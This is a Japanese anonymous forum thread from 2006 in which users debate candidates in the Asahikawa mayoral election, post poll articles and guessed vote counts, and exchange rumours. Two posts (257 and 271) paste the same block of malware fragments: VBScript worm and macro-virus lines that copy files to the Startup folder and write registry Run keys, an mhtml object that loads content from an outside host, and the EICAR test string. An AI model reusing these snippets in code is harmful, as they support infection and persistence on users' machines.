■掲示板に戻る■ 全部 1- 101- 201- 301- 401- 501- 最新50 スレ内検索

10月29日は旭川市長選挙

1 :名無しさん :2006/08/18(金) 22:07 ID:SmKVx/dQ
勝手に市長選挙得票予測

201 :名無しさん :2006/10/23(月) 03:20 ID:mEZZIW56
>>200
菅原功一ひとり旅、まで読んだ

202 :名無しさん :2006/10/23(月) 07:10 ID:Ki.9T/UI
>>200
安住さんより神崎さんの方が教育・福祉に力を入れていらっしゃいますよ。
あなたは本当に今までの安住さんの行動を知っていらっつしゃるのでしょうか?
菅原与党の擁護派としてまちを瀕死の状態にした事実を。
誰かに頼まれたのであれば、しょうがないとは思いますが。
もう少し勉強された方が良いのでは無いかと思いますよ。

203 :名無しさん :2006/10/23(月) 11:52 ID:mYx5uUoY
安住さんが何をしてきたかは分かりませんが・・・夏に旭川に転勤してきました。
でも私なりに各候補の政策を聞いています。神崎さんの言っていることは少し
正論としてはいかがかな?教育・福祉も大事ですが、自身の言動に少しは責任を
もってもらいたい。昨日の演説も完全に子供の論理ですよね。

加藤さんについては、旧態依然とした組織選挙を展開しているのでは。
今朝も奥さんが朝礼にきましたが、自分の言葉ではなく、言わされている
感じがあり、本当に不愉快な気持ちになりました。結局、組織に決められた
候補者なんだな。

西川さんも以前会社にきました。大変マジメな人物と思いますが、
西川さんも組織に縛られているのでは・・・?でも今の民主党、
にはそんな力なんてないか。

安住さん・・・確かに立派な人かもしれませんが、来年の保険のための
選挙戦らしいから、信用ありません。加藤もそうですが、これがだめなら
これ という考えは真剣に考えている市民にとって馬鹿にされている感じ
があります。

だからといって共○党には投票しません。
今のところ、投票は西川さんかな?

204 :名無しさん :2006/10/23(月) 12:52 ID:qV1Yw9EM
うわさとか想像ってこわ〜い

そうでしょ〜!?

205 :名無しさん :2006/10/23(月) 13:42 ID:mEZZIW56
http://mytown.asahi.com/hokkaido/ 朝日ドットコム
加藤礼一氏が職業申告ミス
2006年10月23日

■旭川市長選候補者
 22日告示の旭川市長選に立候補を届け出た元道議の加藤礼一氏(53)が、
市選管に職業を誤って申告していたことがわかった。
すでに辞めているのに「会社役員」として届け出ていた。
加藤選対事務所は「勘違いだった。誠に申し訳ない。市選管に訂正を申し入れたい」と誤申告を認め、
陳謝している。
 加藤選対の説明によると、加藤氏は日高支庁管内に本社を置く建設会社の取締役だったため、
スタッフが選管に申告したが、
今年退任していたことが夜になってわかったという。

206 :名無しさん :2006/10/23(月) 16:07 ID:Ki.9T/UI
>>203
神崎さん誤解を受けやすくて子供っぽい処はあります。
確かに、ひとりで選挙運動やっていて、百人を超える人々に妨害された時に
引き下がるのが大人なら、子供ですよね。
しかし、神崎さんが今日もひとりで自転車に乗って選挙活動している姿を
見かけたら、やっぱり支援したくなりました。
今からでも、選挙の寄付ができるのでしたでしょうか?

207 :名無しさん :2006/10/23(月) 17:15 ID:7uccqsFo
神崎さんは常識的な人って言ってるけど、そうかな?
アッシュ前の街頭演説も小沢が来るから人が集まるの知ってて
早めにやってたんだろうが、普通対抗馬は、暗黙のルールて者があるだろうが、
聴衆の意見も聞かないのが市民の意見を聞くとは思えないな。
子供相手に意見してどうする。

208 :名無しさん :2006/10/23(月) 18:26 ID:UOnHRo7U
>>203
本当に駄目だと思った場合、
共産党に入れるのが正解である事もある。

そんな風に思った昨日の栗東市長選。

209 :名無しさん :2006/10/23(月) 20:26 ID:mltwnhAY
http://myhome.cururu.jp/martan/blog/article/61000457756
このブログは加藤陣営に打撃を与えますか?
ていうか、来年の道議選に大きな影響があることは間違いないでしょうが。

210 :名無しさん :2006/10/23(月) 20:30 ID:BhpA0Koc
神崎氏は選挙違反?
”公職選挙法第百三十七条  教育者(学校教育法 (昭和二十二年法律第二十六号)に規定する学校の長及び教員をいう。)は、
学校の児童、生徒及び学生に対する教育上の地位を利用して選挙運動を
することができない”
ってあるけど、神崎氏のホームページって東海大のホームページ上なんだけど?どう?

211 :名無しさん :2006/10/23(月) 21:02 ID:/VyHKAXk
西川のホームページを見ていて間違いに気付いたので
メールで教えてあげたけど、1週間以上放置されたまま
とうとう公示日を迎えてしまいました。

これから選挙を戦おうという人が、わざわざ自分の
ホームページを見に来てくれた人からミスを指摘
してもらい、それを無視するとは如何なものか?

西川自身がメールチェックやホームページ管理をしていない
のは当然として、3000人の職員を率いようとする人が
僅かな事務所の人員さえ満足に使えないようでは頼りなさ過ぎです。

212 :名無しさん :2006/10/23(月) 22:25 ID:utK4YNB2
飛躍w

213 :名無しさん :2006/10/23(月) 22:39 ID:Ki.9T/UI
>>210
あなたも>>203さんと同じように誰かに頼まれたのですか。
神崎さんのホームページは東海大学内のものではないですよ。
私設のホームページだと言うことは私でも分かりますが、あなたはネットの
素人さんですか?
そもそも泡沫候補と言われてる神崎さんを叩くことが、大人気ないと思いますが。
それとも神崎さんの票が伸びていることに、不安を感じていらっしゃるのでしょうか?

214 :名無しさん :2006/10/23(月) 22:56 ID:gIdO7M6A
ここは、叩き合いの場所?
票が欲しければ各自、良いとこ主張すれば良いんじゃないのか?レベルが低すぎ・・。

215 :名無しさん :2006/10/23(月) 23:27 ID:TrPvodl.
■旭川市長選挙即日開票(開票率100%)■
※投票率57%(投票総数約169,000票)

西川まさひと(無・新)当64,000(民主推薦)
かとう礼一 (無・新)・・60,000(自民推薦・公明支持)
安住太伸  (無・新)・・29,000
おぎう和敏 (無・新)・・12,500(共産推薦)
神崎実    (無・新)・・・3,500

安住、苦戦中。最近は『若ければ誰でもいい』層がたくさんいる。ガンバレ。

公約については、共産党候補以外は、各々なかなか良い政策があると思う。
が、それぞれに斬新なものは少なく、よく言われる地方自治体改革論法の
それぞれの組み合わせをどうするか、どれを捨て、どれを拾うのかに終始。
取捨選択の妙が浮動票獲得力の優劣を決める。

216 :名無しさん :2006/10/23(月) 23:40 ID:Ki.9T/UI
>>215さん
神崎さんの票が2000票も減ったのは、どうしてなのでしょう?
また、神崎さんは自民党党員とポスターに書いてあったのですが、
あれは間違えなのでしょうか?
自民党党員だと致しますと、もう少し票が増えるのではないかと思われます。
よろしければ教えてください。

217 :名無しさん :2006/10/23(月) 23:44 ID:TrPvodl.
西川まさひとを応援する民主党市議団が、
『西川はクリーン』と、菅原功一市長との対比で演説コイていたが、
笑止。民主党市議団は菅原功一援護与党。不信任否決は民主市議のおかげ。

安住が何を言おうと説得力がないのは、市議当選以来7年以上に渡って
菅原功一与党であったからであり、その総括もないままにキレイゴトを並べら
れても困るんだよな。憂うべき旭川の現状、安住にも完全に責任あるだろ。

加藤もだ。加藤は菅原功一後継の道議なのだからな。何をかいわんや。

安住・西川・加藤の有力三候補は、全て悪鬼妖怪菅原功一絡みなんだよ。

218 :名無しさん :2006/10/23(月) 23:55 ID:TrPvodl.
>>216
いや別に。安住と加藤が少し伸ばすかなと(雰囲気雰囲気)。
計算合わないから神崎から引いてみただけです(雰囲気雰囲気)。

自民党特別党員なんて、お金払えば誰でもなれますよ。
私はそんな、金をドブに捨てるような真似はしませんけどね。

219 :名無しさん :2006/10/24(火) 01:24 ID:EVxekTbo
日曜投票か。
あっという間だな、早い。

220 :名無しさん :2006/10/24(火) 06:40 ID:UhFpPDhI
メディア旭川に続き、あさひかわ新聞までが人気投票の類を
やってしまった様である。残念!
告示日以降にやってしまった、あさひかわ新聞の方に問題が
多いのでは無いかと思う。
前回のように公職選挙法違反で逮捕される人々が出なければ
よいのだが、祈るしかない。

221 :名無しさん :2006/10/24(火) 17:06 ID:r.gSvqTA
>>211
加藤のHPなんざ問い合わせページへのリンクが切れている親切っぷりだぞ。
マニフェストの誤字脱字がひどいので教えてやろうと思ったのだが、それ以前だ。

神崎も面白いかと思ったんだが、すばらしい公約を出していたのでいなかったことに。
旭川に在日って今どれくらいいるのか調べたくなったぜ。

222 :名無しさん :2006/10/24(火) 18:22 ID:JDSlTk9o
旭川市長選 世論調査 西川、加藤両氏が先行 追う安住氏、未定も3割  2006/10/24 07:46

 【旭川】二十九日投開票の旭川市長選で、北海道新聞社は二十一、二十二の両日、
北海道新聞情報研究所に委託して電話による世論調査を行った。
立候補した無所属・新人五氏のうち、前民主党第6区総支部副代表の西川将人氏(37)=民主推薦=と、
前自民党道議の加藤礼一氏(53)=自民推薦、公明支持=の両氏が先行して激しく競り合い、
前旭川市議の安住太伸氏(36)が追う展開となっている。
回答者の三割近くがまだ投票者を決めておらず、その動向も勝敗を左右しそうだ。

 旧自由党出身の西川氏は民主党支持層の七割をまとめた上、自民党支持層の一部にも食い込んでいる。
また、無党派層の支持も五候補中で最も高い。職業別では公務員、商業・サービス業の支持を得ている。

 加藤氏は公明党支持層の八割近くを固め、選挙協力の浸透ぶりをうかがわせる一方、
自民党支持層の半分しか固め切れておらず、保守分裂の影響がうかがえる。
職業別では会社員や専業主婦から高い支持を集めている。

 安住氏は自民党支持層でやや苦戦しているものの、無党派層の支持は加藤氏とほぼ互角。
また、二、三十代の若年層にも浸透しつつある。

 共産党旭川地区委員長の荻生和敏氏(56)は、共産党支持層の四割弱の支持を得ているものの、厳しい戦いを強いられている。

 道東海大助教授の神崎実氏(44)は、二十代の一部から支持を得ている。

 ◇調査方法 旭川市内の有権者構成に見合うよう電話帳から性別、年齢別など各階層ごとに
無作為抽出した有権者五百人を対象に電話で聞いた。

http://www.hokkaido-np.co.jp/Php/kiji.php3?&d=20061024&j=0023&k=200610241077

223 :名無しさん :2006/10/24(火) 18:36 ID:k4XsUEwM
加藤選対は勝てると思ってるんだろうな。
甘いよなぁ。情けなくて泣けてくる。

断言する。加藤は西川に最後の二日間で必ず刺される。

224 :名無しさん :2006/10/24(火) 19:17 ID:Yr6rTJgM
>共産党支持層の四割弱
これが一番驚いた。
共産も内部分裂か?

225 :名無しさん :2006/10/24(火) 20:52 ID:x8N/85S6
Kトチャンぺって旭川出身?
どうもなまってる感じがするけど・・・
嫁さんは元スッチーだろ。若いな

226 :名無しさん :2006/10/24(火) 22:11 ID:55Z9yfT6
加藤は留萌出身。

227 :名無しさん :2006/10/24(火) 22:29 ID:rU8XGs5M
道新は西川を当選させたいんだな。
『民主党大好き!!北海道新聞』偏向報道マンセー。

西川に勝てると思ってる加藤選対、かなりオメデタイな。
電話のリサーチなんてアテにならんぞ。

228 :名無しさん :2006/10/24(火) 22:49 ID:3hzFEwOE
自民、民主両党は、道内第二の都市・旭川の今回の市長選を、来年の統一地方選や参院選の前哨戦と位置づけ、両推薦候補を挙党態勢で支援している。

 告示日、加藤氏陣営には自民党道連会長の橋本聖子参院議員や菅原功一市長、西川氏陣営には民主党の小沢一郎代表らが応援に入り、国政選挙並みの激突構図となっている。


ありゃりゃー、そういう位置づけなの?ミンスこれで負けたら完全終了だなw

229 :名無しさん :2006/10/24(火) 23:17 ID:55Z9yfT6
菅原が加藤の応援に入ってるっていうのはスルー?
票増えるんかいな、それ。

230 :名無しさん :2006/10/24(火) 23:29 ID:3hzFEwOE
それは、プラス。菅原は西川が送った刺客だろw
でもいくら旧自由党だからって直々に応援してしまうところが痛い。
補選2つ、栗東市長選、旭川市長選、負けたら4連敗。負けても沖縄で止まるかw
思ったより、細野不倫が結構効いている。モナもここにきて結局降板とか。
女性から総スカンらしい。
民主の支持を固められないのもこれが微妙に影響かw
いいや、北朝鮮問題かww

231 :名無しさん :2006/10/24(火) 23:35 ID:EVxekTbo
旭川の場合は国政の影響あまりなさそうだがな。

232 :名無しさん :2006/10/24(火) 23:56 ID:JDSlTk9o
ID:3hzFEwOE

こいつ旭川の人間じゃないだろ

233 :投票率アップ! :2006/10/24(火) 23:59 ID:rU8XGs5M
旭山動物園に投票所作ったら、率あがるかな。
行ったついでに投票できる。

愚索・・・ごめん。

ラブホに投票所作る。やったついでに投票できる。

買物公園に投票所作る。あまり人が来ないから意味ナシ。

以上、お粗末。

234 :名無しさん :2006/10/25(水) 00:52 ID:sXWBVZho
加藤は限りなく新党大地(鈴木宗男)に近い人間。
加藤を強く推している今津もそうだ。

万が一にも加藤が当選するようなことがあったら
旭川はムネヲの恫喝利権政治で雁字搦めになり
公共事業だらけ土建屋が潤うだけの街になり
結局は夕張市と同じ道を辿るんだろうな。

それだけは勘弁だ!

235 :名無しさん :2006/10/25(水) 00:55 ID:Yb66aXqc
>>233
動物園は今週は休みだよ。

しかし加藤の職業申告ミスって、事務所の不協和音をそのまま露呈してる話じゃないか・・・。

236 :名無しさん :2006/10/25(水) 01:03 ID:od3nG2uI
 
      提携

   ムネヲ=新党大地−−−−−−−民主=小沢
    |      選挙協力・提携    |
    |部下               |弟子 
    |                 |
   加藤(自民)            西川

ムネオは誰を応援してるんだろう?

237 :211へ :2006/10/25(水) 01:21 ID:M5zprUAw
それって、どんな間違いが有ったの?
そして、ほんとにメール送ったの?
ここに書いた事は、証拠となりうるし
個人の追跡も可能になっています。
いい加減な言動は、慎んだ方が良いですよっ!

238 :名無しさん :2006/10/25(水) 08:15 ID:gfIn3G1g
この間、豊岡方面を自転車で走っている候補をみた。”頑張っている”っていうよりも、
なにか違和感を感じた・・・もし当選したら、言っていることを本当にできるのだろうか・・
仲間はいるのだろうか・・・ブレーンのような人はいるのだろうか・・・

239 :名無しさん :2006/10/25(水) 12:17 ID:G6eD47tI
労働組合の反撃、スタートしました!
加藤、労組のスパートについていけるのか?

安住、堅実に伸ばしてます!勝ちは無いけどね。

240 :月光仮面 :2006/10/25(水) 13:42 ID:M5zprUAw
中立であるべき商工会議所会頭が、特定の候補に肩入れするのはいかがなものか?
その権限をもって企業に圧力をかけている由。
相変わらず、少ない公共事業に群がっている建設業界の馬鹿経営者。
加藤苦戦と見るや、票分割で西川に擦り寄っているらしい。いわゆる保険。
馬鹿か!従業員はちゃんと見ている。馬鹿経営者の思い通りに票は動かない!
馬鹿経営者への反発票がどこに流れるのか?実は投票率を左右するのは
こう言った人々ではないのか?
「棄権する事も選挙権の行使だ」などと屁理屈言わないでちゃんと投票しようよ。
一人一人が変わらないと、市政も国政もかわんよ!

241 :名無しさん :2006/10/25(水) 16:11 ID:Ml3otHMM
投票を棄権するの絶対にだめだ。
当たり前のことだと思うが、人それぞれなのかな?

242 :211 :2006/10/25(水) 20:45 ID:oNPL54mk
>>237

「チャレンジ。ふるさと旭川づくり」の提案4に出てくる
「産業クラスター」の解説です。
提案3の「地産地消」と同じ文章になっています。

ここまで書けば、西川関係者なら本当にメールしたのか
どうか調べられますね。
(当選した後、嫌がらせしたりしないでくださいね。)

マニフェスト本文ではないけれど、わざわざ付けた解説が
間違っているのだから、内容を理解してもらおうという
真剣さが少し足りないのではないでしょうか?

西川は市長になっても、きっと「市長への手紙」など
市民の声は無視するタイプですね。

243 :名無しさん :2006/10/25(水) 21:15 ID:ox5AE1jM
>>242
正解!

244 :名無しさん :2006/10/25(水) 22:35 ID:od3nG2uI
かといって、もう一人の候補はどうか

245 :名無しさん :2006/10/25(水) 22:54 ID:jzCDsJcA
全候補者が誰の権力も利用しないで選挙に挑めば良いのに。

246 :名無しさん :2006/10/25(水) 23:11 ID:U/KXix8c

五人も出てるんだな。俺は三番人気に奴に入れる事にしたw。そう安住だ。
三番目ってのは利害関係者のしがらみが一番二番よりは薄いが、そこそこ力が
ある奴に決まってるw。そういう奴が浮動票で受かると結構仕事が出来るんだよ。

市民世論以外には頼るものがないからな。まあ落ちるだろうけどw。
田舎の選挙は税金分取り合戦。俺は土建屋、宗教、官公労の組織票には加担したくない。

247 :名無しさん :2006/10/25(水) 23:20 ID:KpOfwA/k
告示後の戸別ってヤバクない?
浜の人、応援してる車屋さん。
まあ、当選してしまえば、いいんか!

248 :名無しさん :2006/10/25(水) 23:31 ID:G6eD47tI
>>241
棄権はアカン。もし意中がいなければ、白票を投じよう。
>>247
合法なのだよ。名簿があればね。
不特定多数に訪問するのがダメなのよ。

勝てば官軍。

249 :名無しさん :2006/10/25(水) 23:34 ID:G6eD47tI
■旭川市長選挙即日開票(開票率100%)■
※投票率57%(投票総数約169,000票)

西川まさひと(無・新)当63,000(民主推薦)
かとう礼一 (無・新)・・60,000(自民推薦・公明支持)
安住太伸  (無・新)・・30,000
おぎう和敏 (無・新)・・12,500(共産推薦)
神崎実    (無・新)・・・3,500

コレが最終デス。
西川と加藤の差は最後まで詰まらないよん。

250 :カル藤 :2006/10/26(木) 01:20 ID:H0P4Hmwo
公明支持層の8割か。
たとえ「支持」でも強いもんだな。

>>236
宗男はコネ重視だから支援するとしたら加藤じゃない?
苫小牧市長選では自民系の岩倉を応援してたよね。

251 :名無しさん :2006/10/26(木) 07:36 ID:ugmQ9LfU
西川が民主支持層を固め切れないのは労組が機能してないんじゃないか。
市議の中島とかいうのは本気で応援してるの?
西川からみれば、労組なんて当選しちゃえば関係ないけどね。
普通に、加藤が勝つでしょ。

252 :名無しさん :2006/10/26(木) 10:43 ID:GSqv96Tk
労組の追い上げナメたらアカンよー
今津の2回目の落選、金田選挙の敗北・・・
労組の底力は恐ろしい恐ろしい・・・
自治労のマンパワーで5000票でも1日でひっくり返す。

自民党は忘れっぽいよなぁ・・・学習能力ゼロ。

253 :名無しさん :2006/10/26(木) 10:48 ID:Zmayiijk
「われら旭川人の会」の法定ビラ2号。
あれって西川のこと言ってるようなもんじゃん!

それにしてもビラの一番下のwww.reiichi-katoh.comって、、、オイオイ

254 :名無しさん :2006/10/26(木) 11:03 ID:Zv8p.W4k
>>253
どのような内容だったんですか?

255 :名無しさん :2006/10/26(木) 12:01 ID:4w7yNPbY
市職員労働組合との約束。NO!!
協定に縛られ300人の職員定数削減を掲げられない候補は、NO!!

ってヤツ。

市職の連中きっと怒ってるぞ〜

256 :名無しさん :2006/10/26(木) 12:02 ID:KUmcLXf2
ムネオは加藤支持。
http://www.muneo.gr.jp/html/diary200608.html
>2006年8月26日(土)

>旭川市長選挙に出馬される加藤礼一道議の代理の方も来られたので、
>皆さんに紹介しながら、加藤礼一道議の必勝を誓い合う。

流石に応援入りはしないみたいだが。

257 :名無しさん :2006/10/26(木) 12:37 ID:Wy.l.JVk
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

258 :名無しさん :2006/10/26(木) 18:13 ID:GSqv96Tk
↑この板はシロウトが多いな

259 :名無しさん :2006/10/26(木) 18:14 ID:GSqv96Tk
西川は必死だな。
今度も負けたらキツイぞー。

260 :名無しさん :2006/10/26(木) 18:23 ID:ugmQ9LfU
もし落ちたら6回落選かw
つーか、そんな金どっから出てくんの?
金持ち?政党丸抱え?

261 :名無しさん :2006/10/26(木) 19:19 ID:4TuHHMhk
かわいそう。
こうやって目立つ人っていろいろ言われちゃうんですね。

262 :名無しさん :2006/10/26(木) 19:36 ID:tsV0nBbM
>>260
出す奴が居る。貢いで、当選させて後からおいしい思いをしようとしてる奴ら。
今度ダメなら、地元に居れんべ。

263 :名無しさん :2006/10/26(木) 19:40 ID:.HacgG9M
現状、五分五分だな。
ラスト1ハロン、両頭ムチ入れまくり。
Nが先行逃げ切りか?Kが差し切るか?
勝負は投票日当日に行われるであろう「投票啓蒙活動」という名の
電話攻勢量にかかっているな、こりゃ。

264 :名無しさん :2006/10/26(木) 19:49 ID:ugmQ9LfU
>>262
んー、女に惚れるよりも男に惚れるほうが財産無くすっていうからな。
西川は太い客みつけたのか?

265 :名無しさん :2006/10/26(木) 21:00 ID:5I9dUmyY
>>264
選対事務所に行けば、おなじみの顔ぶれ。入るのが嫌なら駐車場に止まって居る車を見れば分かる。
シルバーの外車その他・・。西川も当選したら大変だわ。あの顔ぶれの連中の言いなりにならないといかんべ。
ご愁傷様だ・・。

266 :名無しさん :2006/10/26(木) 23:07 ID:VRol/Pzw
>現状、五分五分だな。
>ラスト1ハロン、両頭ムチ入れまくり。
>Nが先行逃げ切りか?Kが差し切るか?
>勝負は投票日当日に行われるであろう「投票啓蒙活動」という名の
>電話攻勢量にかかっているな、こりゃ。

↑だな。ここに来て、西川が逃げてる。
加藤は選対の方針次第で勝ちもあるのかもしれないな。
自民党旭川の選挙は『投票日当日の電話掛け』が甘いから無理だろう。
考えが本当に甘い。
民主党あさひかわの選対総出の猛烈な電話作戦を見習ったらいいよ。

267 :名無しさん :2006/10/26(木) 23:11 ID:VRol/Pzw
■旭川市長選挙即日開票(開票率100%)■
※投票率57%(投票総数約169,000票)

西川まさひと(無・新)当64,000(民主推薦)
かとう礼一 (無・新)・・61,000(自民推薦・公明支持)
安住太伸  (無・新)・・28,000
おぎう和敏 (無・新)・・12,500(共産推薦)
神崎実    (無・新)・・・3,500

安住が意外と伸びないな…
アノ優等生は、この先どうすんだ??

268 :名無しさん :2006/10/26(木) 23:59 ID:skEucJFA
>>265
アホかw
加藤にそれが当てはまらないとでもいうのか?

269 :名無しさん :2006/10/27(金) 00:07 ID:kAcPUY1Q
>>268
どっちもどっち。
目クソ鼻クソ。

270 :名無しさん :2006/10/27(金) 01:00 ID:hebLFi3g
今日通ったら、加藤の選対の前には運転手付きの黒クラウンだのが路駐しまくり。
相変わらず箱物作るって言ってるみたいだしね。
まだ西川の方がマシかなとも思ったりもして。
他の候補に入れて死に票になるよりはね。

271 :名無しさん :2006/10/27(金) 01:42 ID:ANZuD2ZI
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

272 :名無しさん :2006/10/27(金) 01:47 ID:ANZuD2ZI
市民の期待ってこんな未来なのかな?

一例に過ぎませんが・・・・どうなんでしょうか
まずこの現実を直視して議論する必要があります。

新潟県 平成13年度 県立病院統計 p171
看護師 平均年齢 38.2歳 平均月収 55万4839円
準看護師 平均年齢51.5歳 平均月収 69万8658円
新潟県立松○病院
看護師 平均年齢 40.6歳 平均月収 69万6531円
準看護師 平均年齢 48.9歳 平均月収 75万9238円
中卒準看護師でも年収 1000万が現実にある。

http://www.pref.iwate.jp/~hp0102/01_kyuyo/kyuuyoteisuukannri.pdf#search='%E7%9C%8C%E7%AB%8B%E7%97%85%E9%99%A2%20%E7%9C%8B%E8%AD%B7%E5%B8%AB%20%E5%B9%B3%E5%9D%87%E7%B5%A6%E4%B8%8E'
岩手県
看護師が68.5万  平均 38.2歳
岩手県 (事務) 37.8歳 741918円
P13にありまつ。

平成13年度の県立病院年報だ。
某A病院 事務職員 平均年齢51.4歳 平均月収額84.5333円 同じく 準看護師 48.9歳 759238円
     医療技術員(放射線とかのことか?) 44.2歳 731084円
     看護師 40.6歳 696531円

273 :名無しさん :2006/10/27(金) 01:50 ID:ANZuD2ZI
ちなみに長野県は積極的に経費節減を行っているので
他の自治体より職員の年収は少ないようです。
(他の自治体は公開できないくらい職員の年収が多い)
平均で1000万円近い自治体がざらにある。
@尼崎市 956万円
A東大阪市 947万円
B西宮市 930万円  等
*ちなみに長野県岡谷市 530万円! 
あと公務員は官舎があるので高級な住宅にタダみたいな
家賃で住めるから民間に比べて生活費が少なくて済みます。
日本道路公団(JH)が736万円(平均年齢39・6歳)
首都高速道路公団が851万円(同41・1歳)
阪神高速道路公団が821万円(同41歳)
本州四国連絡橋公団が834万円(同40歳)

いずれもJR東日本(平均年収約700万円)を上回っている。(読売新聞より)

団塊の世代で膨れ上がり、運転、用務、警備、給食、
その他「技術系」と称する職種も多く、
機械的に昇給し、2100人フルタイム職員の
平均給与は年約800万円となっております。
この人たちが35年勤務で退職すると特別加給なしに
約3500万円の退職金をもらいます。

この引当てのほかに健保、年金、失業保険、
など社会保障の雇用者負担を加算し、職員福祉補助金を加えると
区の負担は職員1名あたり年1250万円になります。

274 :名無しさん :2006/10/27(金) 02:35 ID:J0Cu/LpY
>>272
>>273

「新庄、涙の最終打席」まで読んだ。

275 :名無しさん :2006/10/27(金) 03:29 ID:dJtjhZgA
日ハムくたばれ

276 :名無しさん :2006/10/27(金) 04:26 ID:NfF5WtTA
↑お前がくたばれ

277 :名無しさん :2006/10/27(金) 06:39 ID:zk.yTyBA
安住猛追!
とある調査筋の情報。支持率25%まで伸びたらしい。
投票率60%なら45,000。
あー、ひょっとしてひょっとしないかなあ。

折れは安住支持だ!アカと談合やにはもううんざりだぜ。

278 :名無しさん :2006/10/27(金) 07:49 ID:5Ku9keOc
選挙行かねぇ・・くだらん。誰がなっても一緒だ。

279 :名無しさん :2006/10/27(金) 08:18 ID:dJtjhZgA
安住が伸ばせば、西川が減るってことで
加藤市長実現か?
>>276
市ね

280 :名無しさん :2006/10/27(金) 10:08 ID:ANZuD2ZI
>>274
苫小牧駒沢は国体でも破れた・・・

281 :名無しさん :2006/10/27(金) 10:46 ID:ANZuD2ZI
岐阜県庁の裏金問題で、裏金の集約先として開設された県職員組合口座から約1000万円を
引き出したとして県に業務上横領容疑で告発された組合元幹部(49)が県やプール資金問題検討
委員会の調査に対し、一つ目の口座を解約して裏金を移し替えた二つ目の口座を「選挙資金用に
作った」と証言していたことが分かった。県は「別の関係者の話と食い違っており、真偽は不明」と
しているが、移し替えの目的や金の使途を示唆する証言は他にない。今後、県警の捜査でこの
真偽を含めた金の使途の解明が焦点となりそうだ。

 元幹部(現総務部課長補佐)が証言したのは、01年4月に開設された「岐阜県職雅(みやび)会」
名義の口座。県などの調査では、元幹部は01年4月、99年1月に開設した「岐阜県職員組合中央
執行委員長」名義の口座を解約して約1000万円を現金化し、うち500万円をそのまま所持、残る約
500万円を「雅会」口座に移し替えた。その後、01年7月と10月にそれぞれ200万円と300万円余を
引き出した。

 関係者によると、元幹部は調査に対して、当初は口座開設や金の引き出しを否定していたが、その後
「『雅会』は選挙資金用の口座だった」「当時の委員長の指示で200万円と300万円余を引き出した。
用途は聞かなかったが、選挙資金に使ったのだと思う」と話した。しかし、「選挙」が何を指すかは
言わなかったという。当時の委員長は毎日新聞の取材に「元幹部は(裏金の)金庫番だった。自分は
口座の存在も知らず、引き出しの指示も現金の受け取りもしていない」と全面否定している。

 元幹部の証言は調査の途中で変わるなどあいまいで、県は元幹部が金を私的に流用したとみているが、
調査で使途は明確にならないまま。県は「捜査の推移を見守りたい」としている。【中村かさね、秋山信一】

ソース : 毎日新聞 2006年9月19日 3時00分
http://www.mainichi-msn.co.jp/shakai/jiken/news/20060919k0000m040139000c.html

282 :名無しさん :2006/10/27(金) 11:56 ID:Ebso.wd2
基本、道新の調査を参考にね。俺は道新はキライだけど。
わけわからんテキトーな調査会社を信じちゃダメよん。

あと、NHKの出口調査もアテにならんからね。鵜呑みしないように。

283 :名無しさん :2006/10/27(金) 13:47 ID:Xd39.4IA
>>240
商工会議所会頭も今期限り。天下り先を紹介してもらう代わりに
某候補の応援をしてるっていう噂ですね。
商工会議所会頭と会社の代表を両方引退した後は天下り先で悠々自適
と思っていたのでしょうが、、、そうも行かなくなりそうですね。

284 :名無しさん :2006/10/27(金) 23:29 ID:HtZpTCXg
29日マジで行けない!急遽、明日の朝から地方へ・・。
帰って来る頃は開票してる・・。

285 :明日は思いっ切り飲むぞ!の月光仮面 :2006/10/27(金) 23:35 ID:P6m1dN9k
選挙戦も明日で終わりですな。
なんだか、寂しい気もするね。
汗流して働く従業員がいなけりゃ何も出来ない事に気づかずに
会社の為にと、利権をちらつかせる政治屋に擦り寄る馬鹿経営者達の
奮闘ぶりも見納めか?明日一日頑張って下さい!
従業員の皆様!明日一日の辛抱です!お疲れ様です。
あさっては、あんたらの思い通りにはならないって事を馬鹿経営者達に
思い知らせてやってください!

286 :名無しさん :2006/10/27(金) 23:38 ID:kAcPUY1Q
